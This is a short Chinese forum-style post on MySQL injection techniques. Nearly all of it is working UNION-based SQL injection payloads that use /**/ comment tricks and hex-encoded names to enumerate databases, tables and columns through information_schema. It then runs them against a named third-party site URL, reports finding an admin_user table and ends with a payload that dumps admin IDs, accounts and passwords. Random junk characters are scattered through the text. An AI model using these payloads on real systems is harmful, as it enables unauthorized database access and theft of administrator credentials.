mysql注入技巧

admin

查库
. L- Q7 |6 [; W- ^! J
id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*

查表

# m/ }2 ~1 Q. m+ a" ~. D! J& Yid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1

查段

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1

8 h3 b! \) Q1 `& c) Z+ T
0 r( b+ R. g6 Q4 Z8 Amysql5高级注入方法暴表

+ [5 X2 D& B% L$ c$ d/ m例子如下:
9 ^1 y' J% b% t% p5 j: S; Z
1.爆表
; g9 D$ \4 K9 _" @$ S  }* ihttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
这样爆到第4个时出现了admin_user表。

2.暴字段
7 {3 v/ t& t& @: l6 ^% d4 D2 f. Whttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*


3.爆密码
& M3 ^( e+ }, v3 D" M7 X0 ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
  [$ @$ g5 p: W- C* ^& ~' p% ~3 G/ g
1 q5 m* [9 |$ {0 L